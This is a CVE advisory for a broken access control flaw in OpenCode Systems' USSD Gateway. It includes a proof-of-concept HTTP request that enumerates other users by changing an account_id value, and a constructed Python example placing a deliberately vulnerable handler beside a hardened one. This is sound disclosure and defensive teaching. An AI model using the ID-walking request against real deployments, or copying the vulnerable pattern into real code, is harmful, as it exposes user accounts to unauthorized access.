# \[CVE-2025-65238] USSD Gateway Broken Access Control - Sessions

## Description

Broken Access Control in the [USSD Gateway](https://opencode.com/ussi-gateway-function) application offered by [OpenCode Systems](https://opencode.com/) allows a low-privileged user to enumerate all the application sessions. \
<https://www.cve.org/CVERecord?id=CVE-2025-65238>

## Application Details

* **Name**: USSD Gateway
* **Vendor**: OpenCode Systems
* **Version**: OC Release 5 - Version 6.13.11

## Technical Details

* **Vulnerable Endpoint:** `/occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider`

## Exploitation

The vulnerability allows a low-privileged user to enumerate user sessions by supplying the account ID of another user in the request.

From a low-privileged user's session, the vulnerability can be exploited with the request below:

```http
POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]

account_id=33
```

```http
HTTP/2 200 OK
Date: XXX, XX XXX 2025 xx:xx:xx GMT
[...]

{"10":"REDACTED-USERNAME"}
```

Additionally, other users, including a super user, can be enumerated by changing the account ID.
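The root cause is a handler that trusts the client-supplied `account_id` instead of resolving authorization server-side. The following is an added example, not OpenCode's code: a hypothetical "get sub-users by provider" handler shown in its vulnerable form beside a hardened one. The session model, role names, `SUB_USERS` data and `Forbidden` exception are all constructed for illustration.

```python
"""Added example (not OpenCode's code): object-level authorization for a
hypothetical 'get sub-users by provider' handler, vulnerable pattern beside
the hardened one. All names and data below are constructed."""
from dataclasses import dataclass

# Constructed sample data: provider account id -> {sub-user id: username}.
SUB_USERS = {
    33: {10: "provider33-subuser"},
    7: {11: "provider7-subuser", 12: "provider7-other"},
}


@dataclass(frozen=True)
class Session:
    account_id: int  # provider account the authenticated caller belongs to
    role: str        # "subuser" (low privilege), "provider" or "superuser"


class Forbidden(Exception):
    """Raised when the caller is not allowed to read the requested account."""


def get_sub_users_vulnerable(session: Session, requested_account_id: int) -> dict:
    """Vulnerable pattern: the only check is that a session exists. The
    account id from the request body is used directly, so any authenticated
    caller can walk account ids and read every provider's sub-user list
    (the behaviour described for CVE-2025-65238)."""
    return dict(SUB_USERS.get(requested_account_id, {}))


def get_sub_users_hardened(session: Session, requested_account_id: int) -> dict:
    """Hardened pattern: authorization is decided from the server-side session
    before any data is read. A superuser may read any account, a provider only
    its own account, and the low-privilege sub-user role is never allowed to
    list sub-users at all. Denying before the lookup also means an
    unauthorized caller cannot tell existing account ids from missing ones."""
    if session.role == "subuser":
        raise Forbidden("sub-user role cannot list sub-users")
    if session.role != "superuser" and session.account_id != requested_account_id:
        raise Forbidden(
            f"account {session.account_id} may not read account {requested_account_id}"
        )
    return dict(SUB_USERS.get(requested_account_id, {}))


def is_denied(session: Session, requested_account_id: int) -> bool:
    """True if the hardened handler refuses the request (used for checks)."""
    try:
        get_sub_users_hardened(session, requested_account_id)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    low_priv = Session(account_id=7, role="subuser")
    # Vulnerable: a sub-user of account 7 reads account 33's sub-users.
    print("vulnerable:", get_sub_users_vulnerable(low_priv, 33))
    # Hardened: the same request is refused.
    print("hardened denies:", is_denied(low_priv, 33))
```

The fix is the ordering: identity and role come from the session, the requested object is checked against them, and only then is the record fetched. Any response difference between "forbidden" and "not found" for unauthorized callers should also be avoided, since it would let a caller confirm which account IDs exist even without reading them.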
